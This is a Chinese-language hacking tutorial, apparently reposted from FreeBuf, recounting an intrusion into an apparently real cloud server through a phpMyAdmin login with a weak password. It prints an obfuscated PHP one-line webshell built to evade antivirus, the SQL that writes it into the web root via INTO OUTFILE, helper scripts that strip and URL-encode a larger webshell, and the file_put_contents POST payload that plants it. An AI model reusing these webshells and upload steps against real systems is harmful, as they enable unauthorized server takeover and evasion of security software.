解读木马GetShell的另类姿势

安全 黑客攻防
其实吧,之前是想写一长篇小说的,把整个过程详细的写一遍,怕各位看官拍砖,转了话风 ……

0×00 工欲善其事,必先利其器

其实吧,之前是想写一长篇小说的,把整个过程详细的写一遍,怕各位看官拍砖,转了话风 ……

[[150544]]

中间件:

XAMPP(能运行PHP程序即可)

‍‍武器:

Chrome浏览器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)

‍‍函数:

file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函数

0×01 上小马

扫C段时发现一机器有phpMyAdmin服务,就尝试了一下弱口令,root123果断进入,然后就开始了下面的故事。

探测IP为阿里云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:

  1. <?php                  
  2. @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                    
  3. @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                    
  4. @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}                    
  5. [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);  
  6. //密码-7    
  7. ?> 

一句话木马原形:

  1. assert($_POST[-7]); 

写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):

  1. use test;  
  2. drop table if exists temp;  
  3. create table temp (cmd text NOT NULL);  
  4. insert into temp (cmd) values("<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> ");  
  5. select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';  
  6. drop table if exists temp; 

木马GetShell的另类姿势

 

0×02 处理大马

解读木马GetShell的另类姿势

 

用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。

这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。

首先在本地把大马处理好以便于作为post参数:

用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。

C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):

  1. strip.php:  
  2. <?php  
  3. echo php_strip_whitespace('strip_shell.php');  
  4. ?>  
  5. urlencode.php:  
  6. <?php  
  7. echo urlencode(file_get_contents('urlencode_shell.php'));  
  8. ?> 

执行过程如下(注意文件名称变化和执行顺序):

解读木马GetShell的另类姿势

 

所有文件如下:

解读木马GetShell的另类姿势

 

其中urldecode.php文件为最终处理的文件,文件内容如下:

解读木马GetShell的另类姿势

 

0×03 GetShell

最后请出主角Advanced REST client插件,长这样:

解读木马GetShell的另类姿势

 

这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:

  1. file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容")); 

最后POST表单如下:

解读木马GetShell的另类姿势

 

至此,成功GetShell,有错误或好的建议请指正提出。

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2010-07-12 15:36:45

SQL Server

2010-06-28 14:30:08

SQL Server

2012-11-20 09:49:33

Windows 8操作系统

2013-07-16 14:48:03

大数据大数据技术数据

2019-07-19 10:44:34

移动应用APP

2011-05-11 11:10:10

网游病毒营销病毒

2017-07-06 09:33:18

AMDEPYC处理器

2015-03-13 09:30:23

iOS内存管理

2020-03-10 18:53:16

移动支付另类支付APP

2010-11-23 11:16:35

MySQL表别名

2009-10-23 17:10:27

试用达人

2011-04-25 13:13:02

Javafinalize

2012-06-15 17:50:26

2013-08-22 17:42:59

2009-03-09 13:59:22

IDC行业

2009-09-09 16:06:08

对象

2018-09-21 10:45:54

2010-09-14 09:28:34

2014-09-25 09:00:57

2014-07-24 09:48:15

getshellgetshell防御主机敏感文件泄漏
点赞
收藏

51CTO技术栈公众号